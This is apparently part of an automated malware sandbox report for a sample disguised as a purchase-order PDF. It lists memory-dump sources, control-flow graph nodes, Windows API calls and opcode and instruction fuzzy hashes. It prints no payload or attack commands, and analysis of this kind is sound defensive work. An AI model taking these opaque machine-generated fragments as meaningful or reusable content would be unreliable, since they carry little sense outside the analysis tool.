1552a3-1552a5 2009->2013 2014 15529f-1552a1 2009->2014 2015 1552a7-1552ac 2013->2015 2016 1552ae 2013->2016 2014->1993 2015->1993 2016->1993 2023->1934 2024->1934 2026->1961 2027->1961 2028->1951 2029->1951
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Haq$Haq
                                                                                                                                    • API String ID: 0-4016896955
                                                                                                                                    • Opcode ID: cc2bb597968c37f5b379d02cb7b54fcbf40333c8a42a5af73129f6a2752f137c
                                                                                                                                    • Instruction ID: 8e11304ed21410191ff962e8e0c99998cf58d7393fe50bd1520435cfcae7cafe
                                                                                                                                    • Opcode Fuzzy Hash: cc2bb597968c37f5b379d02cb7b54fcbf40333c8a42a5af73129f6a2752f137c
                                                                                                                                    • Instruction Fuzzy Hash: 32B1C030304651CFCB159F39C8A4B6A7BE6AF89306F154569E816CF3A5CB74CC89CB91

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2030 155460-15546d 2031 155475-155477 2030->2031 2032 15546f-155473 2030->2032 2034 155688-15568f 2031->2034 2032->2031 2033 15547c-155487 2032->2033 2035 155690 2033->2035 2036 15548d-155494 2033->2036 2039 155695-1556cd 2035->2039 2037 155629-15562f 2036->2037 2038 15549a-1554a9 2036->2038 2041 155635-155639 2037->2041 2042 155631-155633 2037->2042 2038->2039 2040 1554af-1554be 2038->2040 2060 1556d6-1556da 2039->2060 2061 1556cf-1556d4 2039->2061 2048 1554c0-1554c3 2040->2048 2049 1554d3-1554d6 2040->2049 2043 155686 2041->2043 2044 15563b-155641 2041->2044 2042->2034 2043->2034 2044->2035 2046 155643-155646 2044->2046 2046->2035 2050 155648-15565d 2046->2050 2051 1554c5-1554c8 2048->2051 2052 1554e2-1554e8 2048->2052 2049->2052 2053 1554d8-1554db 2049->2053 2069 155681-155684 2050->2069 2070 15565f-155665 2050->2070 2055 1554ce 2051->2055 2056 1555c9-1555cf 2051->2056 2062 155500-15551d 2052->2062 2063 1554ea-1554f0 2052->2063 2057 1554dd 2053->2057 2058 15552e-155534 2053->2058 2066 1555f4-155601 2055->2066 2064 1555e7-1555f1 2056->2064 2065 1555d1-1555d7 2056->2065 2057->2066 2067 155536-15553c 2058->2067 2068 15554c-15555e 2058->2068 2071 1556e0-1556e2 2060->2071 2061->2071 2102 155526-155529 2062->2102 2072 1554f4-1554fe 2063->2072 2073 1554f2 2063->2073 2064->2066 2074 1555d9 2065->2074 2075 1555db-1555e5 2065->2075 2094 155615-155617 2066->2094 2095 155603-155607 2066->2095 2077 155540-15554a 2067->2077 2078 15553e 2067->2078 2088 155560-15556c 2068->2088 2089 15556e-155591 2068->2089 2069->2034 2079 155677-15567a 2070->2079 2080 155667-155675 2070->2080 2081 1556e4-1556f6 2071->2081 2082 1556f7-1556fe 2071->2082 2072->2062 2073->2062 2074->2064 2075->2064 2077->2068 2078->2068 2079->2035 2086 15567c-15567f 2079->2086 2080->2035 2080->2079 2086->2069 2086->2070 2104 1555b9-1555c7 2088->2104 2089->2035 2106 155597-15559a 2089->2106 2098 15561b-15561e 2094->2098 2095->2094 2097 155609-15560d 2095->2097 2097->2035 2103 155613 2097->2103 2098->2035 2099 155620-155623 2098->2099 2099->2037 2099->2038 2102->2066 2103->2098 2104->2066 2106->2035 2108 1555a0-1555b2 2106->2108 2108->2104
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,aq$,aq
                                                                                                                                    • API String ID: 0-2990736959
                                                                                                                                    • Opcode ID: dcbebcee53678d7d8ef1ae6080a74c575e478417a22e81b3c078b16d818d0412
                                                                                                                                    • Instruction ID: 68ce470ae15c85ba3cc09245712ccde0a36877fe4d2b65f811612baf93c40eb5
                                                                                                                                    • Opcode Fuzzy Hash: dcbebcee53678d7d8ef1ae6080a74c575e478417a22e81b3c078b16d818d0412
                                                                                                                                    • Instruction Fuzzy Hash: B281AE30B00945CFCB18CF69C4A49AAB7B3BF88316B658169E825DF365E731EC45CB51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4']q$4']q
                                                                                                                                    • API String ID: 0-3120983240
                                                                                                                                    • Opcode ID: c268870cb62bdc93f63abe8b11b234776f61765f01c4bfd358ac7b81dad239a5
                                                                                                                                    • Instruction ID: e7bf223496b35895acec35378d387fb65c04469117ac784245df3eced8a16ccf
                                                                                                                                    • Opcode Fuzzy Hash: c268870cb62bdc93f63abe8b11b234776f61765f01c4bfd358ac7b81dad239a5
                                                                                                                                    • Instruction Fuzzy Hash: 9D519370704205CFDB14DB69C8916BEB7F6EF88301F15846AE921EF251DB34CD498B91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4']q$4']q
                                                                                                                                    • API String ID: 0-3120983240
                                                                                                                                    • Opcode ID: 0578882b274db036e22f049804e092a4c544ea6511ac2fc0edcb622bae341a80
                                                                                                                                    • Instruction ID: 7bab96e4963ac0707d7ebb561a7f82c9cd2f8caf0b3b28db5c2a1fbaa3ce9b9b
                                                                                                                                    • Opcode Fuzzy Hash: 0578882b274db036e22f049804e092a4c544ea6511ac2fc0edcb622bae341a80
                                                                                                                                    • Instruction Fuzzy Hash: 33F0AF353002146FDB081AAA9C5497A7ADBEFC83A1B048429FD19CB3A0DE75CC0183A0
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35E60222
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                    • Opcode ID: ab8e6643796cc0eb022433876a50945caad3806c60e15ed70284e2e226c47aa7
                                                                                                                                    • Instruction ID: 73e4f933d933799a3b9682d6fedcc1bdcaf3ae6bbb6884f3bdb1bf14ae7c7cd8
                                                                                                                                    • Opcode Fuzzy Hash: ab8e6643796cc0eb022433876a50945caad3806c60e15ed70284e2e226c47aa7
                                                                                                                                    • Instruction Fuzzy Hash: 5151C0B5D00359DFDB14CFA9C984ADEBBB5BF48354F24812AE819AB210D774A885CF90
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35E60222
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                    • Opcode ID: e5f738cccc82f771ec7733e9b4d07fc6f7617629bf1c4cb2c88dbb8f6f9f1ca4
                                                                                                                                    • Instruction ID: ee42d272fdb05353c96d6c9cb4a8d4699924334e9d0bb94961196f7014e0480d
                                                                                                                                    • Opcode Fuzzy Hash: e5f738cccc82f771ec7733e9b4d07fc6f7617629bf1c4cb2c88dbb8f6f9f1ca4
                                                                                                                                    • Instruction Fuzzy Hash: 5341D1B5D00319DFDB14CF99C984ADEBBB5FF48354F20812AE819AB210D774A885CF90
                                                                                                                                    APIs
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 35E61E81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714655100-0
                                                                                                                                    • Opcode ID: 6060bcff3bffaa463cccf243739bdb306be6fdf5f6f37438b8ded079e1ac8655
                                                                                                                                    • Instruction ID: 403162ce92a09a6344cb567881314a46ac78094b1496a6674d1f4e9df5509b22
                                                                                                                                    • Opcode Fuzzy Hash: 6060bcff3bffaa463cccf243739bdb306be6fdf5f6f37438b8ded079e1ac8655
                                                                                                                                    • Instruction Fuzzy Hash: 704136B9A00349CFDB14CF99C444A9ABBF5FF88314F24C459D559AB321D774E841CBA0
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35E60C4F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                    • Opcode ID: 6947a3ac6935334f3157783e4a7f6dafec17404fa9ba4912392d67f7cbeca742
                                                                                                                                    • Instruction ID: 4c14b5880db030a51d1a7b3ea97ce1d7a9d482034467c50dc35b12519b0708f8
                                                                                                                                    • Opcode Fuzzy Hash: 6947a3ac6935334f3157783e4a7f6dafec17404fa9ba4912392d67f7cbeca742
                                                                                                                                    • Instruction Fuzzy Hash: B421C4B5D002589FDB10CFAAD585ADEBBF4FB49310F14841AE959A3310D378A950CFA5
                                                                                                                                    APIs
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 35E6D445
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Initialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                    • Opcode ID: 36c89564f3491a88fd310cdbf6383f88c257b9c387d6242803feb27bc2a50315
                                                                                                                                    • Instruction ID: e5a60b5bac5389e16ccac269fd29cc665ac4d8b3354c7a173d465e7d26fb7dda
                                                                                                                                    • Opcode Fuzzy Hash: 36c89564f3491a88fd310cdbf6383f88c257b9c387d6242803feb27bc2a50315
                                                                                                                                    • Instruction Fuzzy Hash: D41133B59047488FCB20DF9AC645B9EBBF4EB49324F108419D518A7200D778A940CBA5
                                                                                                                                    APIs
                                                                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,35E6D92F), ref: 35E6E765
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                    • Opcode ID: b2200206e1b38e9566adefc328bcc3bad3a9596e448073bfdda05e8f2dfe3452
                                                                                                                                    • Instruction ID: fc99fc2c600ac4992bbd206ec150bf0b6c765df2887fbd1a9347d5769a2decb8
                                                                                                                                    • Opcode Fuzzy Hash: b2200206e1b38e9566adefc328bcc3bad3a9596e448073bfdda05e8f2dfe3452
                                                                                                                                    • Instruction Fuzzy Hash: AE112EB6C04748CFDB10CF9AD584B9EFBF4EB49324F10842AE918A3240D378A544CFA6
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Timer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                    • Opcode ID: 7ab90249d8f9c516fe9284960e21e7eee0cece0c4b3c11b56e1f6e05699cc3a3
                                                                                                                                    • Instruction ID: 0776589f844a5924b3a5eaadf67a403eda5902f9afdb6641880a06916d901244
                                                                                                                                    • Opcode Fuzzy Hash: 7ab90249d8f9c516fe9284960e21e7eee0cece0c4b3c11b56e1f6e05699cc3a3
                                                                                                                                    • Instruction Fuzzy Hash: 441103B58003489FDB10DF9AC585BDEBBF8EB49320F108419D959A3200C379A580CFA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LR]q
                                                                                                                                    • API String ID: 0-3081347316
                                                                                                                                    • Opcode ID: faa124fc27a3b3c6cc413b5d6b847c4856d7f1433f42bca94d9db39fc341e7a0
                                                                                                                                    • Instruction ID: 3e18cf1f4a97018418901645b079622fab649a4f96624d909a02150eb7948571
                                                                                                                                    • Opcode Fuzzy Hash: faa124fc27a3b3c6cc413b5d6b847c4856d7f1433f42bca94d9db39fc341e7a0
                                                                                                                                    • Instruction Fuzzy Hash: 1EA1CA74A00209CFCF05EFA8DA9599D7BF5FF48301B104529E449AB765DB38694ACF90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LR]q
                                                                                                                                    • API String ID: 0-3081347316
                                                                                                                                    • Opcode ID: 824debda2c6e5ca76798a87a5fe1ab42cdd7a421df6a7b37cb01b15631f4cec1
                                                                                                                                    • Instruction ID: 79ead609648c9d41e32d19cbca80667a6dbf73242c46622dbf234c57e7a1ea9a
                                                                                                                                    • Opcode Fuzzy Hash: 824debda2c6e5ca76798a87a5fe1ab42cdd7a421df6a7b37cb01b15631f4cec1
                                                                                                                                    • Instruction Fuzzy Hash: 5DA1B874A00209CFCF05EFA8EA8599DBBF5FF48301B104525E409AB765DB386A4ACF90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o]q
                                                                                                                                    • API String ID: 0-794736227
                                                                                                                                    • Opcode ID: 276afedb2336c371dd66237b800dddb4a5863721600dc1de84a7ea44a93b5f3d
                                                                                                                                    • Instruction ID: a8b2b5c3eb60ed0c26ea94e54fbf977312c661e3961fa33447f0d2cc56dd73d2
                                                                                                                                    • Opcode Fuzzy Hash: 276afedb2336c371dd66237b800dddb4a5863721600dc1de84a7ea44a93b5f3d
                                                                                                                                    • Instruction Fuzzy Hash: B741FE31B042048FCB149B78D854AAE7BB6AFC8701F24456AE91ADB7A1CF309C46CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2aaef16032ab460707dd549543db27cc06447fbb091643ef6aa7e2a20f3e969a
                                                                                                                                    • Instruction ID: bf85a78ad6d9b7ccf086714ff0bfee050b8b74633d7bacdb385f77bca3a21862
                                                                                                                                    • Opcode Fuzzy Hash: 2aaef16032ab460707dd549543db27cc06447fbb091643ef6aa7e2a20f3e969a
                                                                                                                                    • Instruction Fuzzy Hash: 1CE1C274A00218CFDB25EF60CA54BADBBB6EF89301F1084A9D80977765CB395E82DF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da2d08154d2cdba8916a7f05409b51b9c471a327b9ca4cfb02d16bdc83f60803
                                                                                                                                    • Instruction ID: 160f3998e5f0d8b04a269c41b928b943c19da84571d7090fe56047d1b9e731eb
                                                                                                                                    • Opcode Fuzzy Hash: da2d08154d2cdba8916a7f05409b51b9c471a327b9ca4cfb02d16bdc83f60803
                                                                                                                                    • Instruction Fuzzy Hash: 5DE1D374A00218CFDB25EF60CA54BADB7B6EF89301F1084A9D80977755CB395E82DF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3d6fe006d12d97c5cb527e8dad97e376fc4ce79ac983d69f7c58efc109ae3b3f
                                                                                                                                    • Instruction ID: 8a1d58ab51266510536742541d5e2d2e743e604c4ffbc64e3d4d61c1769941bc
                                                                                                                                    • Opcode Fuzzy Hash: 3d6fe006d12d97c5cb527e8dad97e376fc4ce79ac983d69f7c58efc109ae3b3f
                                                                                                                                    • Instruction Fuzzy Hash: BA711434700205CFCB14DF68C895A6A7BF6EF59702B5944A9E826CB3B1DB74EC85CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e986e91181b01bc40f11320039d02efc17f25689ce18d30ec027cb45e234df0e
                                                                                                                                    • Instruction ID: cdbb0ea92839010afd41c4df116a220814d4ed59c59bdc9361de3cbcc9950805
                                                                                                                                    • Opcode Fuzzy Hash: e986e91181b01bc40f11320039d02efc17f25689ce18d30ec027cb45e234df0e
                                                                                                                                    • Instruction Fuzzy Hash: 1A718F31608655CFC715CF28C8D896A7BB1FF46312B168499FC699F2A2C731EC89CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 28f2feaaa03d001162e093b745a449ec41fe0b9ffd676a9312abc86fcc6df418
                                                                                                                                    • Instruction ID: 823cd0c208886491d91b6b5643fe8088f1e5936db696d81dd382aa46b79baccb
                                                                                                                                    • Opcode Fuzzy Hash: 28f2feaaa03d001162e093b745a449ec41fe0b9ffd676a9312abc86fcc6df418
                                                                                                                                    • Instruction Fuzzy Hash: F2712930A05245CFCB12CF28C8805AABBF5FF45311B1585A6D865EF362D731ED5ACBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f033df561d24cd8464b47272bcacea292393a3fe3d39e5ae792c82e568fb193d
                                                                                                                                    • Instruction ID: 3a3cee08540eba0bea05622d1359d2d8d7589754ae2610fd75ecc46f0ff9c6f2
                                                                                                                                    • Opcode Fuzzy Hash: f033df561d24cd8464b47272bcacea292393a3fe3d39e5ae792c82e568fb193d
                                                                                                                                    • Instruction Fuzzy Hash: 71712875A41219CFDB15DFB5C9A999DBBF2FF88340F10852AE406AB350DB389982CF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da171c2ec2eaf73a5be4cc246ac6453b7752d3c8685648284d9a94a0acbbd104
                                                                                                                                    • Instruction ID: 4c01a80bbfcc3c601bc873c235c9e6f97d7b371dcaae262f4414047375d7c842
                                                                                                                                    • Opcode Fuzzy Hash: da171c2ec2eaf73a5be4cc246ac6453b7752d3c8685648284d9a94a0acbbd104
                                                                                                                                    • Instruction Fuzzy Hash: CF616E74A00218CFDB25DF65CA54BADBBB6FF48300F10889A990A77765CB395D82DF44
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5d6c6661afe36d45f41803251e4b31d150f33a54a90737bdd1ba96870ac6d88c
                                                                                                                                    • Instruction ID: b7a7263cc3dfa130956d7b37b242bc8cbd13b70dabc9cc6891304f0d729180c8
                                                                                                                                    • Opcode Fuzzy Hash: 5d6c6661afe36d45f41803251e4b31d150f33a54a90737bdd1ba96870ac6d88c
                                                                                                                                    • Instruction Fuzzy Hash: 6C713B70905298DFEF15CF69C888B99BBB2BF8A304F1084EAD04DBB211D7311A85CF12
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8aef5d1bc41e5b1fee9dbd8298d1dbc98afc89fa77f190e7358a25b6ccf54491
                                                                                                                                    • Instruction ID: 2fba036e1c33341e2869fd0e100cba52140dd23b83899fda260458e0c4089a1b
                                                                                                                                    • Opcode Fuzzy Hash: 8aef5d1bc41e5b1fee9dbd8298d1dbc98afc89fa77f190e7358a25b6ccf54491
                                                                                                                                    • Instruction Fuzzy Hash: E7512274D01318CFDB14DFA5D994AAEBBB6FF88304F208529D809AB355DB395A4ACF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9be69f6b677a97f97c299c220d51cfe59dec0cde1a3380756c99a2d9bad41b6f
                                                                                                                                    • Instruction ID: 1162167ce341307a2fb8bb4af1c5b2f7f49ae7a6c04c0b6acbaece9a8b1220fe
                                                                                                                                    • Opcode Fuzzy Hash: 9be69f6b677a97f97c299c220d51cfe59dec0cde1a3380756c99a2d9bad41b6f
                                                                                                                                    • Instruction Fuzzy Hash: 4951A274E00218DFDB54DFA9C990ADDBBB6FF89300F208169D819AB365DB356946CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 49a67ad7a89b78f4c0d3ead6a472877200704388d64ac9b8dd5b180f1a4a3a56
                                                                                                                                    • Instruction ID: 26f8891387cf092d9aa0c9e27e73c0de26992adee4df46a808f3e95d93091e5f
                                                                                                                                    • Opcode Fuzzy Hash: 49a67ad7a89b78f4c0d3ead6a472877200704388d64ac9b8dd5b180f1a4a3a56
                                                                                                                                    • Instruction Fuzzy Hash: DC51A274E01208DFCB08DFA9D58499DBBF2FF89305B208469E819BB364DB35A946CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2234f491c23b8b5ad278b780735fc6dc9f60a838835022ae2b2a92ff60926604
                                                                                                                                    • Instruction ID: 0072ffe20efba0d952aca875c45ad491a7692398189030c48e535220b526b13f
                                                                                                                                    • Opcode Fuzzy Hash: 2234f491c23b8b5ad278b780735fc6dc9f60a838835022ae2b2a92ff60926604
                                                                                                                                    • Instruction Fuzzy Hash: CD519D74D02228CFDB64DF64C984BEDBBB2BB49305F1055A9D409AB350DB39AA86CF50
